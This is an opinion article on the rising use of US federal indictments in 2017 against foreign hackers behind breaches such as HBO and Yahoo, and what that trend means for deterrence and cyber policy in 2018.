What the rise of cyber indictments means for 2018
The growing use of indictments throughout 2017 was arguably the most impactful government action to counter cyber attacks, and yet it received little attention. In November, federal prosecutors indicted an Iranian national with military links for his role in the HBO data exfiltration. A week later, indictments were issued against three members of the Chinese threat group known as APT 3, or Gothic Panda, for corporate espionage. The following day, a Canadian pled guilty to collaborating with Russian nationals in the Yahoo breach, the same FSB officers and criminals who had been indicted earlier in the year.
These are perhaps the most high-profile indictments of 2017, but criminals have also recently been indicted or arrested for masterminding global botnets, including Andromeda and Kelihos. In fact, there have been as many high-profile indictments in 2017 as in the last few years combined, and there are already rumors that the Department of Justice may indict six Russian nationals in 2018 in connection with the 2016 DNC hack.
Unfortunately, many of these indictments do not actually lead to criminal convictions. For instance, the 2014 indictments against PLA members marked the first prominent use of indictments to counter cyber theft and related crimes, yet they have not resulted in any arrests. Nevertheless, this naming-and-shaming strategy has a number of valuable aspects that point toward a clearer path for future cyber policy and the prosecution of cybercrime.
First, indictments are foundational to any deterrent strategy. Their increasing use may help prompt policymakers to pursue more comprehensive legislation and strategy, and finally take steps toward changing the risk calculus of state and non-state attackers. This is long overdue and necessary. As Senator Angus King has noted, “This country has no strategy or doctrine around cyber attacks.”
In addition, while it is not a guarantee, naming and shaming does directly affect attackers. Although these mercenaries may enjoy safe haven within their own countries, they cannot travel freely beyond those borders without risking arrest. Russian cyber criminals have been caught in the Maldives, Barcelona, and Prague (to name a few), and one of them was recently sentenced to 27 years in prison.
The arrests and indictments of attackers for breaches such as OPM, Yahoo, and HBO further illustrate that attackers can no longer act entirely with impunity. These mercenaries likely hold a wealth of information about the government and military organizations on whose behalf they conducted the attacks. As more indictments lead to arrests, foreign governments will likely grow concerned about the intelligence that could be gained when these attackers are captured.
Importantly, the indictments also demonstrate that attribution, although difficult, is possible. By bringing the full force of its investigative capabilities and data sources to bear, the DoJ has been able to attribute some of the largest breaches. This matters not only for making arrests, but also because it provides a significant signaling mechanism to nation-states.
As the line between the cyber activities of quasi-affiliated criminal groups and those of foreign governments becomes increasingly blurred, indictments provide a means to condemn foreign nation-state activity without directly implicating the governments themselves, which minimizes the risk of escalation and spillover into military, economic, or diplomatic retaliation. For instance, in last month’s indictments of the Chinese nationals, U.S. Attorney Soo C. Song clearly specified, “It is not an element or subject of this indictment that there is state sponsorship.” This distinction is important, since state sponsorship would constitute a breach of the 2015 U.S.-China cyber agreement against corporate espionage.
With the DoJ considering charges against at least six Russian nationals for the DNC breach, the rule of law is proving a valuable tool for finally countering widespread cybercrime and espionage. While indictments alone are not sufficient to fill the current vacuum in U.S. strategy for countering cyber attacks, they provide the necessary foundation for a U.S. legal response that produces real-world consequences for attackers. As indictments become an increasingly integral component of the U.S. response to cybercrime and espionage throughout 2018, it will be worth watching whether, and how, they change the risk calculus of both nation-state and non-state attackers.